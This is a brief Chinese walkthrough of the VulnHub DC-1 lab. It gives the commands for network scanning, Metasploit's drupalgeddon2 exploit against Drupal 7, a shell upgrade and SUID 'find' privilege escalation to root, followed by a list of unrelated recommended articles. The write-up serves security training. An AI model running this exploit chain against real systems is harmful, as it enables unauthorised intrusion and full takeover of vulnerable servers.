DC-1

1.扫描主机

sudo arp-scan -l

扫描端口

nmap -p- 192.168.42.147

扫描主机指纹，发现Drupal 7 cms

2.开始msf漏洞利用

mfconsole

search drupal

search 7600

use exploit/unix/webapp/drupal_drupalgeddon2

set rhosts 192.168.42.147

run

3.metepreter> 看到这个，说明成功拿下shell

shell

python -c "import pty;pty.spawn('/bin/bash')" 美化一下

4.开始提权

find / -perm -u=s -type f 2>/dev/null

发现/usr/bin/find,利用提权
find . -exec /bin/sh \;

成功提权，寻找flag

本栏目推荐文章
• BOSHIDA DC电源模块的关键参数解读
• vulnhub-DC-6
• BOSHIDA DC电源模块技术的未来发展趋势
• BOSHIDA 了解DC电源模块的基本参数及选择方法
• BOSHIDA DC电源模块的故障排查与维修技巧
• AP5127 DC-DC降压恒流IC 12-24V 9V2A 40珠双色LED车灯方案
• BOSHIDA DC电源模块的安全性能评估及认证标准
• vulnhub-DC-5
• BOSHIDA DC电源模块的可持续发展与环境保护
• BOSHIDA DC电源模块的应用范围与市场前景